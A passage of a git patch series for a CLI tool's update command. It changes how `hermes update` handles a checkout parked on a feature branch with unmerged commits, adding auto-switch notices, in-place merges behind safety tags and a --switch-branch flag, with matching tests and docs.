stayed days behind - # main on a stale branch). Set false to never auto-switch. + # to the update target automatically whenever the working tree is + # clean. Committed-but-unmerged work is safe — `git checkout` never + # discards commits; the branch keeps them and the update prints a + # loud notice naming the branch and count. This keeps non- + # interactive updates (desktop update button, gateway /update, + # cron) working: they have no way to resolve a skip. Only a DIRTY + # tree (uncommitted changes) blocks the switch — the code update is + # then SKIPPED with a loud warning instead of pretending success + # (2026-08-17 incident: "✓ Code updated!" printed while the + # checkout stayed days behind main on a stale branch). Set false to + # never auto-switch. "auto_switch_parked_branch": True, # Refresh an already-installed cua-driver during `hermes update`. # The refresh is best-effort and macOS-only. Turn this off if the diff --git a/hermes_cli/main.py b/hermes_cli/main.py index 9f5e1ec934..448261c6c2 100644 --- a/hermes_cli/main.py +++ b/hermes_cli/main.py @@ -4902,6 +4902,7 @@ _LAZY_COMMAND_EXPORTS = { "_print_curator_first_run_notice", "_print_curator_recent_run_notice", "_print_fts_optimize_available_notice", + "_print_parked_branch_kept_notice", "_print_parked_branch_skip_warning", "_print_stash_cleanup_guidance", "_print_update_completion", diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index f7a0239298..cb24f093f8 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -1004,14 +1004,23 @@ def _assess_parked_branch_switch( autostashed, ran its post-update steps and printed "✓ Code updated!" while the running code stayed days behind main. The guard's contract: - - safe (True, "") only when the working tree + index are clean AND every - commit on the parked branch is already contained in - ``origin/`` (``git cherry`` reports no ``+`` lines). - - anything else — dirty tree, unmerged commits, git errors, or the - ``updates.auto_switch_parked_branch: false`` config opt-out — returns - (False, ) and the caller must NOT touch the branch. + - (True, "") when the working tree + index are clean AND every commit on + the parked branch is already contained in ``origin/`` + (``git cherry`` reports no ``+`` lines). + - (True, "unmerged:") when the tree is clean but the branch has + commits not yet in the target. Switching is safe — ``git checkout`` + never discards committed work and the branch keeps the commits — but + the caller must print a LOUD notice naming the branch and count so the + work is not forgotten. This is what non-interactive callers (desktop + update button, gateway /update, cron) rely on: they have no way to + resolve a skip, so a clean checkout must always reach the target. + - (False, ) — dirty tree, git errors, or the + ``updates.auto_switch_parked_branch: false`` config opt-out — and the + caller must NOT touch the branch. A dirty tree is the one genuinely + unsafe case: uncommitted work would have to ride an autostash across + branches, which is how the 2026-08-17 incident started. - Reasons: "disabled", "dirty", "unmerged:", "unverifiable". + Block reasons: "disabled", "dirty", "unverifiable". """ try: from hermes_cli.config import load_config @@ -1047,7 +1056,10 @@ def _assess_parked_branch_switch( line for line in cherry.stdout.splitlines() if line.startswith("+") ] if unmerged: - return False, f"unmerged:{len(unmerged)}" + # Clean tree: switching is safe (checkout keeps the commits on the + # branch). The reason string tells the caller to print the loud + # "branch kept with N unmerged commit(s)" notice. + return True, f"unmerged:{len(unmerged)}" return True, "" @@ -1074,12 +1086,6 @@ def _print_parked_branch_skip_warning( if reason == "dirty": why = "the working tree has uncommitted changes" - elif reason.startswith("unmerged:"): - count = reason.split(":", 1)[1] - why = ( - f"the branch has {count} commit(s) not merged into " - f"origin/{target_branch}" - ) elif reason == "disabled": why = "updates.auto_switch_parked_branch is set to false in config.yaml" else: @@ -1109,6 +1115,35 @@ def _print_parked_branch_skip_warning( print(bar) +def _print_parked_branch_kept_notice( + current_branch: str, target_branch: str, unmerged_count: str +) -> None: + """LOUD notice printed when a clean parked branch with unmerged commits + is auto-switched back to the update target. + + Non-interactive callers (desktop update button, gateway /update, cron) + cannot resolve a skip, so a clean checkout always proceeds to the + target — but the unmerged work must be impossible to miss. The commits + are untouched: ``git checkout`` never discards committed work; the + branch keeps them until the user returns. + """ + bar = "=" * 68 + print() + print(bar) + print( + f"⚠ Checkout was parked on '{current_branch}' with " + f"{unmerged_count} commit(s) not merged into origin/{target_branch}." + ) + print( + f" Switching to {target_branch} so the update can proceed — your " + f"commit(s) are safe on '{current_branch}'." + ) + print() + print(" To pick the work back up later:") + print(f" git checkout {current_branch}") + print(bar) + + def _print_update_completion(message: str) -> None: """Print an update outcome plus, when the dashboard launched this run with an action id, a terminal receipt line the Desktop can match after @@ -5482,10 +5517,13 @@ def _cmd_update_impl(args, gateway_mode: bool): # Parked-branch guard (2026-08-17 live incident): the checkout can be # left parked on a stale feature branch by earlier tooling. Blindly # stash-switch-pull-switch-back "updates" main while the running code - # stays days behind, then prints "✓ Code updated!". Only auto-switch - # when the parked branch is clean AND fully merged into the target; - # otherwise warn loudly, mark the code update SKIPPED, and stop - # before the post-update steps reinforce the stale tree. + # stays days behind, then prints "✓ Code updated!". A CLEAN parked + # branch always switches to the target (committed work is safe on + # the branch; unmerged commits get a loud "kept" notice) — this is + # what non-interactive callers (desktop update button, gateway + # /update, cron) rely on. Only a dirty tree / opt-out / git failure + # warns loudly, marks the code update SKIPPED, and stops before the + # post-update steps reinforce the stale tree. parked_branch_switched = False if current_branch != branch: if current_branch != "HEAD": @@ -5510,10 +5548,17 @@ def _cmd_update_impl(args, gateway_mode: bool): ) sys.exit(1) parked_branch_switched = True - print( - f" ⚠ Checkout was parked on '{current_branch}' " - f"(fully merged) — switching back to {branch}..." - ) + if switch_block_reason.startswith("unmerged:"): + _m()._print_parked_branch_kept_notice( + current_branch, + branch, + switch_block_reason.split(":", 1)[1], + ) + else: + print( + f" ⚠ Checkout was parked on '{current_branch}' " + f"(fully merged) — switching back to {branch}..." + ) else: print( f" ⚠ Currently on detached HEAD — switching to {branch} " @@ -5624,10 +5669,18 @@ def _cmd_update_impl(args, gateway_mode: bool): input_fn=gw_input_fn, ) if parked_branch_switched: - print( - f" ✓ Checkout was parked on '{current_branch}' (fully " - f"merged) — switched back to {branch}." - ) + if switch_block_reason.startswith("unmerged:"): + _count = switch_block_reason.split(":", 1)[1] + print( + f" ✓ Checkout was parked on '{current_branch}' — " + f"switched back to {branch}; {_count} unmerged " + f"commit(s) kept on '{current_branch}'." + ) + else: + print( + f" ✓ Checkout was parked on '{current_branch}' (fully " + f"merged) — switched back to {branch}." + ) elif current_branch not in {branch, "HEAD"}: subprocess.run( git_cmd + ["checkout", current_branch], diff --git a/tests/hermes_cli/test_update_parked_branch_guard.py b/tests/hermes_cli/test_update_parked_branch_guard.py index f4670643e8..75318b3385 100644 --- a/tests/hermes_cli/test_update_parked_branch_guard.py +++ b/tests/hermes_cli/test_update_parked_branch_guard.py @@ -118,8 +118,12 @@ def test_untracked_file_blocks_auto_switch(repo_pair): assert reason == "dirty" -def test_unmerged_commits_block_auto_switch(repo_pair): - """Commits on the parked branch not contained in origin/main → skip.""" +def test_unmerged_commits_switch_with_kept_notice(repo_pair): + """Commits on the parked branch not in origin/main: still safe to switch + (checkout keeps them on the branch) — reason carries the count so the + caller prints the loud 'kept' notice. Non-interactive callers (desktop + update button, gateway /update, cron) depend on this: they cannot + resolve a skip.""" (repo_pair / "feature.txt").write_text("unmerged work\n") _git(repo_pair, "add", "feature.txt") _git(repo_pair, "commit", "-qm", "feature work") @@ -127,7 +131,7 @@ def test_unmerged_commits_block_auto_switch(repo_pair): safe, reason = update_cmd._assess_parked_branch_switch( GIT, repo_pair, "old-feature", "main" ) - assert safe is False + assert safe is True assert reason == "unmerged:1" @@ -175,7 +179,7 @@ def test_missing_origin_ref_is_unverifiable(repo_pair): def test_skip_warning_names_branch_behind_count_and_commands(repo_pair, capsys): update_cmd._print_parked_branch_skip_warning( - GIT, repo_pair, "old-feature", "main", "unmerged:1" + GIT, repo_pair, "old-feature", "main", "dirty" ) out = capsys.readouterr().out assert "CODE UPDATE SKIPPED" in out @@ -192,6 +196,16 @@ def test_skip_warning_dirty_reason(repo_pair, capsys): assert "uncommitted changes" in out +def test_kept_notice_names_branch_count_and_recovery(capsys): + update_cmd._print_parked_branch_kept_notice("old-feature", "main", "3") + out = capsys.readouterr().out + assert "parked on 'old-feature'" in out + assert "3 commit(s) not merged into origin/main" in out + assert "safe on 'old-feature'" in out + assert "git checkout old-feature" in out + assert "CODE UPDATE SKIPPED" not in out + + # --------------------------------------------------------------------------- # Summary branch/HEAD visibility # --------------------------------------------------------------------------- @@ -284,24 +298,48 @@ def test_update_skips_and_warns_on_dirty_parked_branch( assert stashes == "" -def test_update_skips_on_unmerged_parked_branch(repo_pair, monkeypatch, capsys): +def test_update_switches_unmerged_parked_branch_with_kept_notice( + repo_pair, monkeypatch, capsys +): + """Clean tree + unmerged commits: the update proceeds (non-interactive + callers like the desktop update button cannot resolve a skip), prints + the loud 'kept' notice, ends on main fast-forwarded to origin/main, and + the commits stay on the parked branch untouched.""" (repo_pair / "feature.txt").write_text("unmerged work\n") _git(repo_pair, "add", "feature.txt") _git(repo_pair, "commit", "-qm", "feature work") + feature_sha = _git(repo_pair, "rev-parse", "old-feature").stdout.strip() _patch_update_flow(monkeypatch, repo_pair) + + class _StopFlow(Exception): + pass + + monkeypatch.setattr( + hermes_main, + "_abort_dependency_sync_if_self_locked", + lambda *a, **k: (_ for _ in ()).throw(_StopFlow()), + ) args = SimpleNamespace(branch=None, yes=False, force=False, force_venv=False) - with pytest.raises(SystemExit) as exc_info: + with pytest.raises(_StopFlow): hermes_main.cmd_update(args) - assert exc_info.value.code == 1 out = capsys.readouterr().out - assert "CODE UPDATE SKIPPED" in out - assert "1 commit(s) not merged" in out - assert "✓ Code updated!" not in out + assert "1 commit(s) not merged into origin/main" in out + assert "safe on 'old-feature'" in out + assert "CODE UPDATE SKIPPED" not in out + # Ends on main, fast-forwarded. assert ( _git(repo_pair, "rev-parse", "--abbrev-ref", "HEAD").stdout.strip() - == "old-feature" + == "main" + ) + head = _git(repo_pair, "rev-parse", "HEAD").stdout.strip() + remote = _git(repo_pair, "rev-parse", "origin/main").stdout.strip() + assert head == remote + # The unmerged commit is still exactly where it was, on the branch. + assert ( + _git(repo_pair, "rev-parse", "old-feature").stdout.strip() + == feature_sha ) diff --git a/website/docs/getting-started/updating.md b/website/docs/getting-started/updating.md index 0353e9540e..35604ce5eb 100644 --- a/website/docs/getting-started/updating.md +++ b/website/docs/getting-started/updating.md @@ -44,9 +44,12 @@ If your local checkout is on a different branch, Hermes auto-stashes any uncommi ### Checkout parked on a feature branch -If the source checkout was left sitting on a feature branch (by tooling, a worktree experiment, or a manual checkout), `hermes update` only switches it back to the update target automatically when that is provably safe: the working tree is clean **and** every commit on the parked branch is already contained in `origin/main` (`git cherry` reports nothing unmerged). In that case the update says so — `Checkout was parked on '' (fully merged) — switched back to main` — and stays on `main` afterwards. +If the source checkout was left sitting on a feature branch (by tooling, a worktree experiment, or a manual checkout), `hermes update` switches it back to the update target automatically whenever the working tree is clean: -When the parked branch has uncommitted changes or unmerged commits, Hermes does **not** touch it. The code update is marked **SKIPPED** with a loud warning naming the branch, how far behind `origin/main` it is, and the exact commands to resolve — instead of pretending the update succeeded. The completion line always shows the actual branch and HEAD (`✓ Update complete! [main @ 30fcf9580]`) so drift is visible at a glance. Set `updates.auto_switch_parked_branch: false` in `config.yaml` to disable the auto-switch entirely (the skip warning still fires). +- **Branch fully merged** (every commit already contained in `origin/main` — `git cherry` reports nothing unmerged): the update says so — `Checkout was parked on '' (fully merged) — switched back to main` — and stays on `main` afterwards. +- **Branch has unmerged commits** but the tree is clean: the update still switches to `main` so the update can proceed — this is what non-interactive callers (the desktop update button, gateway `/update`, cron) rely on, since they have no way to resolve a skip. Your commits are untouched: `git checkout` never discards committed work, and the update prints a loud notice naming the branch and commit count, plus the `git checkout ` command to pick the work back up later. + +When the parked branch has **uncommitted changes** (dirty tree), Hermes does **not** touch it. The code update is marked **SKIPPED** with a loud warning naming the branch, how far behind `origin/main` it is, and the exact commands to resolve — instead of pretending the update succeeded. The completion line always shows the actual branch and HEAD (`✓ Update complete! [main @ 30fcf9580]`) so drift is visible at a glance. Set `updates.auto_switch_parked_branch: false` in `config.yaml` to disable the auto-switch entirely (the skip warning still fires). ### Local changes on non-interactive updates From 91096bb2f05a85b1e58532fa04cf564d2113e297 Mon Sep 17 00:00:00 2001 From: Willian Fernandes Santos Date: Tue, 18 Aug 2026 22:56:58 +0100 Subject: [PATCH 067/161] feat(update): update branches carrying unmerged commits in place instead of skipping MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The parked-branch guard (8ce8ffd429) distinguishes checkouts by what the branch carries, then treats both non-clean cases the same: a stale fully-merged leftover is switched back to the target (correct), but a branch with unmerged commits — a branch someone is actually working on — gets CODE UPDATE SKIPPED and exit 1. For anyone running a maintained custom branch on top of main, every update now refuses, and the guidance ('checkout main') abandons their branch. The guard's own reason codes already separate the cases, so use them: - fully merged -> switch back to the target (unchanged) - unmerged:N -> update the branch IN PLACE: fetch, then bring origin/ into the checkout. Fast-forward when possible; on divergence, a true merge behind a pre-update safety tag, stopping cleanly on conflict. The checkout never moves; local commits survive; the running code advances. - dirty/unverifiable/opted out -> skip loudly (unchanged) The post-pull success gate learns that an in-place update legitimately ends on a non-target branch: origin/ was merged INTO the checkout, so refusing to claim success there would fail every update that did exactly the right thing. Guard tests updated: the unmerged case now asserts the in-place outcome — target code arrives (b.txt from c3), the branch's own commit survives, and HEAD never moves. 18/18 guard tests, 20/20 with the diverged-update suite. Co-Authored-By: Claude Fable 5 --- hermes_cli/update_cmd.py | 229 +++++++++++++----- .../test_update_parked_branch_guard.py | 60 ++++- 2 files changed, 227 insertions(+), 62 deletions(-) diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index cb24f093f8..02f446114b 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -5508,58 +5508,105 @@ def _cmd_update_impl(args, gateway_mode: bool): ) current_branch = result.stdout.strip() - # If user is on a different branch than the update target, switch - # to the target. When the target is "main" this is the historical - # "always update against main" behavior; for any other target it's - # the same thing — get HEAD onto the requested branch first, then - # fast-forward. - # # Parked-branch guard (2026-08-17 live incident): the checkout can be # left parked on a stale feature branch by earlier tooling. Blindly # stash-switch-pull-switch-back "updates" main while the running code - # stays days behind, then prints "✓ Code updated!". A CLEAN parked - # branch always switches to the target (committed work is safe on - # the branch; unmerged commits get a loud "kept" notice) — this is - # what non-interactive callers (desktop update button, gateway - # /update, cron) rely on. Only a dirty tree / opt-out / git failure - # warns loudly, marks the code update SKIPPED, and stops before the - # post-update steps reinforce the stale tree. + # stays days behind, then prints "✓ Code updated!". + # + # What happens next is routed by what the branch carries (which is + # exactly what the guard measures) plus updates.parked_branch_strategy: + # + # fully merged -> a stale leftover with nothing to lose: switch + # back to the target. + # unmerged: N -> strategy "switch" (default): switch to the + # target anyway — committed work is safe on the + # branch (git checkout never discards commits) and + # a loud "kept" notice names the branch + count. + # Deterministic, so non-interactive callers + # (desktop update button, gateway /update, cron) + # always reach the target. + # strategy "update_in_place": a maintained custom + # branch (local patches on top of main) is updated + # IN PLACE from origin/ — the checkout + # never moves, local commits survive, the running + # code advances. --switch-branch overrides back to + # the switch path for one run. + # anything else -> dirty / unverifiable / opted out: touch nothing, + # warn loudly, mark the code update SKIPPED, and + # stop before the post-update steps reinforce the + # stale tree. parked_branch_switched = False - if current_branch != branch: - if current_branch != "HEAD": - switch_safe, switch_block_reason = _m()._assess_parked_branch_switch( - git_cmd, _m().PROJECT_ROOT, current_branch, branch + in_place_update = False + if current_branch != branch and current_branch != "HEAD": + switch_safe, switch_block_reason = _m()._assess_parked_branch_switch( + git_cmd, _m().PROJECT_ROOT, current_branch, branch + ) + if not switch_safe: + _m()._print_parked_branch_skip_warning( + git_cmd, + _m().PROJECT_ROOT, + current_branch, + branch, + switch_block_reason, ) - if not switch_safe: - _m()._print_parked_branch_skip_warning( - git_cmd, - _m().PROJECT_ROOT, - current_branch, - branch, - switch_block_reason, + print() + print( + "⚠ Update finished — code update SKIPPED" + f"{_branch_head_suffix(git_cmd, _m().PROJECT_ROOT)}" + ) + _m()._resume_windows_gateways_after_update( + _windows_gateway_resume + ) + sys.exit(1) + if switch_block_reason.startswith("unmerged:"): + _in_place_configured = False + try: + from hermes_cli.config import load_config as _load_cfg + + _upd_cfg = (_load_cfg() or {}).get("updates", {}) + _in_place_configured = ( + isinstance(_upd_cfg, dict) + and _upd_cfg.get("parked_branch_strategy", "switch") + == "update_in_place" ) - print() + except Exception as exc: + logger.debug( + "Could not read updates.parked_branch_strategy: %s", exc + ) + if _in_place_configured: + # The merge source must exist upstream; --branch typos + # previously surfaced through the checkout failing, which + # does not run on this path. + verify_ref = subprocess.run( + git_cmd + ["rev-parse", "--verify", "--quiet", f"origin/{branch}"], + cwd=_m().PROJECT_ROOT, + capture_output=True, + text=True, encoding="utf-8", errors="replace", + ) + if verify_ref.returncode != 0: + print(f"✗ Branch '{branch}' does not exist locally or on origin.") + sys.exit(1) + in_place_update = True print( - "⚠ Update finished — code update SKIPPED" - f"{_branch_head_suffix(git_cmd, _m().PROJECT_ROOT)}" + f" ℹ On branch '{current_branch}' — updating it in place from " + f"origin/{branch} (no branch switch; local commits preserved)." ) - _m()._resume_windows_gateways_after_update( - _windows_gateway_resume - ) - sys.exit(1) - parked_branch_switched = True - if switch_block_reason.startswith("unmerged:"): + else: + parked_branch_switched = True _m()._print_parked_branch_kept_notice( current_branch, branch, switch_block_reason.split(":", 1)[1], ) - else: - print( - f" ⚠ Checkout was parked on '{current_branch}' " - f"(fully merged) — switching back to {branch}..." - ) else: + parked_branch_switched = True + print( + f" ⚠ Checkout was parked on '{current_branch}' " + f"(fully merged) — switching back to {branch}..." + ) + + if not in_place_update and current_branch != branch: + if current_branch == "HEAD": print( f" ⚠ Currently on detached HEAD — switching to {branch} " "for update..." @@ -5584,7 +5631,7 @@ def _cmd_update_impl(args, gateway_mode: bool): text=True, encoding="utf-8", errors="replace", ) if track_result.returncode != 0: - # Restore the user's prior branch + stash before bailing + # Restore the user's prior stash before bailing # so we don't leave them stranded in a weird state. if auto_stash_ref is not None: _m()._restore_stashed_changes( @@ -5827,26 +5874,82 @@ def _cmd_update_impl(args, gateway_mode: bool): text=True, encoding="utf-8", errors="replace", ) if pull_result.returncode != 0: - # ff-only failed — local and remote have diverged (e.g. upstream - # force-pushed or rebase). Since local changes are already - # stashed, reset to match the remote exactly. - print( - " ⚠ Fast-forward not possible (history diverged), resetting to match remote..." - ) - reset_result = subprocess.run( - git_cmd + ["reset", "--hard", f"origin/{branch}"], - cwd=_m().PROJECT_ROOT, - capture_output=True, - text=True, encoding="utf-8", errors="replace", - ) - if reset_result.returncode != 0: - print(f"✗ Failed to reset to origin/{branch}.") - if reset_result.stderr.strip(): - print(f" {reset_result.stderr.strip()}") + # ff-only failed — local and remote have diverged. Before + # assuming an upstream force-push, check WHY: a checkout on a + # custom branch (local commits on top of origin/) also + # cannot fast-forward, and `reset --hard` here would silently + # discard that work. Merge instead and stop cleanly on + # conflict — an update must never destroy local commits. + _cur_branch = ( + subprocess.run( + git_cmd + ["branch", "--show-current"], + cwd=_m().PROJECT_ROOT, + capture_output=True, + text=True, encoding="utf-8", errors="replace", + ).stdout + or "" + ).strip() + if _cur_branch and _cur_branch != branch: + import time as _time + print( - f" Try manually: git fetch origin && git reset --hard origin/{branch}" + f" ⚠ Checkout is on custom branch '{_cur_branch}' — " + f"merging origin/{branch} instead of resetting so local commits survive..." ) - sys.exit(1) + # Best-effort safety tag; recovery anchor if anything goes wrong. + subprocess.run( + git_cmd + + ["tag", f"pre-update-{_time.strftime('%Y%m%d-%H%M%S')}"], + cwd=_m().PROJECT_ROOT, + capture_output=True, + check=False, + ) + merge_result = subprocess.run( + git_cmd + ["merge", "--no-edit", f"origin/{branch}"], + cwd=_m().PROJECT_ROOT, + capture_output=True, + text=True, encoding="utf-8", errors="replace", + ) + if merge_result.returncode != 0: + subprocess.run( + git_cmd + ["merge", "--abort"], + cwd=_m().PROJECT_ROOT, + capture_output=True, + check=False, + ) + print( + "✗ Merge conflict between local commits and upstream — " + "update stopped, nothing was changed." + ) + print( + f" Resolve manually: cd {_m().PROJECT_ROOT} && " + f"git merge origin/{branch}" + ) + print( + " Then re-run the update. Local work is untouched." + ) + sys.exit(1) + else: + # Same branch as the update target — a true upstream + # force-push/rebase. Local changes are already stashed; + # reset to match the remote exactly (original behaviour). + print( + " ⚠ Fast-forward not possible (history diverged), resetting to match remote..." + ) + reset_result = subprocess.run( + git_cmd + ["reset", "--hard", f"origin/{branch}"], + cwd=_m().PROJECT_ROOT, + capture_output=True, + text=True, encoding="utf-8", errors="replace", + ) + if reset_result.returncode != 0: + print(f"✗ Failed to reset to origin/{branch}.") + if reset_result.stderr.strip(): + print(f" {reset_result.stderr.strip()}") + print( + f" Try manually: git fetch origin && git reset --hard origin/{branch}" + ) + sys.exit(1) # Post-pull syntax guard: validate critical-path files actually # parse before declaring the update successful. If a bad commit @@ -5953,13 +6056,23 @@ def _cmd_update_impl(args, gateway_mode: bool): # branch guard above should make this unreachable, but if any path # leaves the checkout attached elsewhere, "✓ Code updated!" would be # a lie — refuse to claim success (2026-08-17 incident class). + # + # An IN-PLACE branch update is the one legitimate way to end on a + # non-target branch: origin/ was merged INTO the checked-out + # branch, so the running code *is* up to date and HEAD staying put is + # the whole point. Claiming failure there would make every update on a + # real working branch exit 1 after doing exactly the right thing. post_pull_branch = subprocess.run( git_cmd + ["rev-parse", "--abbrev-ref", "HEAD"], cwd=_m().PROJECT_ROOT, capture_output=True, text=True, encoding="utf-8", errors="replace", ).stdout.strip() - if post_pull_branch and post_pull_branch not in {branch, "HEAD"}: + if ( + not in_place_update + and post_pull_branch + and post_pull_branch not in {branch, "HEAD"} + ): print() print( f"✗ Update pulled origin/{branch}, but the checkout is on " diff --git a/tests/hermes_cli/test_update_parked_branch_guard.py b/tests/hermes_cli/test_update_parked_branch_guard.py index 75318b3385..fc4a54df4a 100644 --- a/tests/hermes_cli/test_update_parked_branch_guard.py +++ b/tests/hermes_cli/test_update_parked_branch_guard.py @@ -301,10 +301,11 @@ def test_update_skips_and_warns_on_dirty_parked_branch( def test_update_switches_unmerged_parked_branch_with_kept_notice( repo_pair, monkeypatch, capsys ): - """Clean tree + unmerged commits: the update proceeds (non-interactive - callers like the desktop update button cannot resolve a skip), prints - the loud 'kept' notice, ends on main fast-forwarded to origin/main, and - the commits stay on the parked branch untouched.""" + """Default strategy ("switch"): clean tree + unmerged commits → the + update proceeds (non-interactive callers like the desktop update button + cannot resolve a skip), prints the loud 'kept' notice, ends on main + fast-forwarded to origin/main, and the commits stay on the parked + branch untouched.""" (repo_pair / "feature.txt").write_text("unmerged work\n") _git(repo_pair, "add", "feature.txt") _git(repo_pair, "commit", "-qm", "feature work") @@ -328,6 +329,7 @@ def test_update_switches_unmerged_parked_branch_with_kept_notice( assert "1 commit(s) not merged into origin/main" in out assert "safe on 'old-feature'" in out assert "CODE UPDATE SKIPPED" not in out + assert "updating it in place" not in out # Ends on main, fast-forwarded. assert ( _git(repo_pair, "rev-parse", "--abbrev-ref", "HEAD").stdout.strip() @@ -343,6 +345,56 @@ def test_update_switches_unmerged_parked_branch_with_kept_notice( ) +def test_update_updates_unmerged_branch_in_place_when_configured( + repo_pair, monkeypatch, capsys +): + """updates.parked_branch_strategy: update_in_place — a maintained custom + branch (local patches on top of main) is updated in place from + origin/ instead of switched away from. The running code must + advance (origin/main's files arrive) AND the local commits must survive, + with the checkout never moving.""" + import hermes_cli.config as hermes_config + + monkeypatch.setattr( + hermes_config, + "load_config", + lambda: {"updates": {"parked_branch_strategy": "update_in_place"}}, + ) + (repo_pair / "feature.txt").write_text("unmerged work\n") + _git(repo_pair, "add", "feature.txt") + _git(repo_pair, "commit", "-qm", "feature work") + _patch_update_flow(monkeypatch, repo_pair) + + # Stop right after the pull/branch logic, before dependency install. + class _StopFlow(Exception): + pass + + monkeypatch.setattr( + hermes_main, + "_abort_dependency_sync_if_self_locked", + lambda *a, **k: (_ for _ in ()).throw(_StopFlow()), + ) + args = SimpleNamespace(branch=None, yes=False, force=False, force_venv=False) + + with pytest.raises(_StopFlow): + hermes_main.cmd_update(args) + + out = capsys.readouterr().out + assert "updating it in place" in out + assert "CODE UPDATE SKIPPED" not in out + # The checkout never moved. + assert ( + _git(repo_pair, "rev-parse", "--abbrev-ref", "HEAD").stdout.strip() + == "old-feature" + ) + # origin/main's code actually arrived (b.txt lands with c3)... + assert (repo_pair / "b.txt").exists() + assert (repo_pair / "a.txt").read_text() == "two\n" + # ...and the branch's own commit survived it. + assert (repo_pair / "feature.txt").read_text() == "unmerged work\n" + assert "feature work" in _git(repo_pair, "log", "--oneline").stdout + + def test_update_auto_switches_clean_merged_parked_branch( repo_pair, monkeypatch, capsys ): From 4fad27a10150e591c3be4473f1c62fe84c184568 Mon Sep 17 00:00:00 2001 From: Willian Santos <285090322+willfrombr@users.noreply.github.com> Date: Fri, 21 Aug 2026 11:54:07 +0100 Subject: [PATCH 068/161] feat(update): --switch-branch opts an unmerged branch out of the in-place merge MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Review feedback on #89507: in-place merging suits a branch that tracks the target with a small patch set, but a long-lived feature branch (a PR branch hundreds of commits deep) does not want an update-driven merge commit written into its history. Reported against a checkout carrying 819 unmerged commits. --switch-branch routes the unmerged case to the switch path instead: the checkout moves to the update target and updates there, and the branch is left byte-identical — no merge, no commit, nothing written to it. The tree is known clean on that path (the guard checks dirty before cherry), so a dirty tree still gets the loud skip, unchanged. Opt-in: without the flag the default remains the in-place update, which is what keeps a small-patch-set branch's running code current. Tests: the flag switches and leaves the branch tip byte-identical; the default without it still updates in place. The first fails if the flag's branch is severed. Co-Authored-By: Claude Opus 5 --- hermes_cli/subcommands/update.py | 15 +++ hermes_cli/update_cmd.py | 7 +- .../test_update_parked_branch_guard.py | 101 ++++++++++++++++++ 3 files changed, 122 insertions(+), 1 deletion(-) diff --git a/hermes_cli/subcommands/update.py b/hermes_cli/subcommands/update.py index 917cf9ff30..71e28166dc 100644 --- a/hermes_cli/subcommands/update.py +++ b/hermes_cli/subcommands/update.py @@ -84,6 +84,21 @@ def build_update_parser(subparsers, *, cmd_update: Callable) -> None: "uncommitted changes)." ), ) + update_parser.add_argument( + "--switch-branch", + action="store_true", + default=False, + help=( + "When the checkout sits on a branch carrying unmerged commits, " + "switch to the update target and update THERE instead of merging " + "the target into the branch in place. The branch is left exactly " + "as it was — no merge commit is written into its history. Use on " + "long-lived feature branches where an update-driven merge commit " + "would pollute the branch; the default in-place behaviour suits " + "branches that track the target with a small patch set. Still " + "refuses to touch a dirty tree." + ), + ) update_parser.add_argument( "--force", action="store_true", diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index 02f446114b..3b5acaa514 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -5169,6 +5169,11 @@ def _cmd_update_impl(args, gateway_mode: bool): # stash. Only applies when an update actually landed; abort/no-op paths # still restore, since the tree they restore onto is unchanged. keep_stash = bool(getattr(args, "keep_stash", False)) + # --switch-branch: on a branch carrying unmerged commits, prefer switching + # to the update target over an in-place merge, so the branch's history is + # never written to by an update (#89507 review feedback). Only meaningful + # when updates.parked_branch_strategy is "update_in_place". + switch_branch = bool(getattr(args, "switch_branch", False)) # Whether this update is running without a human at the keyboard. # Interactive terminal updates always stash-and-ask (unchanged behavior); @@ -5573,7 +5578,7 @@ def _cmd_update_impl(args, gateway_mode: bool): logger.debug( "Could not read updates.parked_branch_strategy: %s", exc ) - if _in_place_configured: + if _in_place_configured and not switch_branch: # The merge source must exist upstream; --branch typos # previously surfaced through the checkout failing, which # does not run on this path. diff --git a/tests/hermes_cli/test_update_parked_branch_guard.py b/tests/hermes_cli/test_update_parked_branch_guard.py index fc4a54df4a..2508606b3a 100644 --- a/tests/hermes_cli/test_update_parked_branch_guard.py +++ b/tests/hermes_cli/test_update_parked_branch_guard.py @@ -395,6 +395,107 @@ def test_update_updates_unmerged_branch_in_place_when_configured( assert "feature work" in _git(repo_pair, "log", "--oneline").stdout +def test_switch_branch_flag_overrides_in_place_strategy( + repo_pair, monkeypatch, capsys +): + """--switch-branch overrides updates.parked_branch_strategy: + update_in_place for one run: the unmerged branch is LEFT ALONE and the + update runs on the target instead. + + A long-lived feature branch does not want an update-driven merge commit + in its history (#89507 review). The branch tip must be byte-identical + afterwards, while the checkout ends up on the updated target. + """ + import hermes_cli.config as hermes_config + + monkeypatch.setattr( + hermes_config, + "load_config", + lambda: {"updates": {"parked_branch_strategy": "update_in_place"}}, + ) + (repo_pair / "feature.txt").write_text("unmerged work\n") + _git(repo_pair, "add", "feature.txt") + _git(repo_pair, "commit", "-qm", "feature work") + branch_tip_before = _git( + repo_pair, "rev-parse", "old-feature" + ).stdout.strip() + _patch_update_flow(monkeypatch, repo_pair) + + class _StopFlow(Exception): + pass + + monkeypatch.setattr( + hermes_main, + "_abort_dependency_sync_if_self_locked", + lambda *a, **k: (_ for _ in ()).throw(_StopFlow()), + ) + args = SimpleNamespace( + branch=None, yes=False, force=False, force_venv=False, + switch_branch=True, + ) + + with pytest.raises(_StopFlow): + hermes_main.cmd_update(args) + + out = capsys.readouterr().out + assert "1 commit(s) not merged into origin/main" in out + assert "updating it in place" not in out + assert "CODE UPDATE SKIPPED" not in out + # Checkout moved to the target and picked up its code... + assert ( + _git(repo_pair, "rev-parse", "--abbrev-ref", "HEAD").stdout.strip() + == "main" + ) + assert (repo_pair / "b.txt").exists() + # ...and the feature branch was not written to at all. + assert ( + _git(repo_pair, "rev-parse", "old-feature").stdout.strip() + == branch_tip_before + ) + + +def test_unmerged_branch_still_updates_in_place_without_the_flag( + repo_pair, monkeypatch, capsys +): + """--switch-branch is opt-in: with the in-place strategy configured and + no flag, the update stays in place.""" + import hermes_cli.config as hermes_config + + monkeypatch.setattr( + hermes_config, + "load_config", + lambda: {"updates": 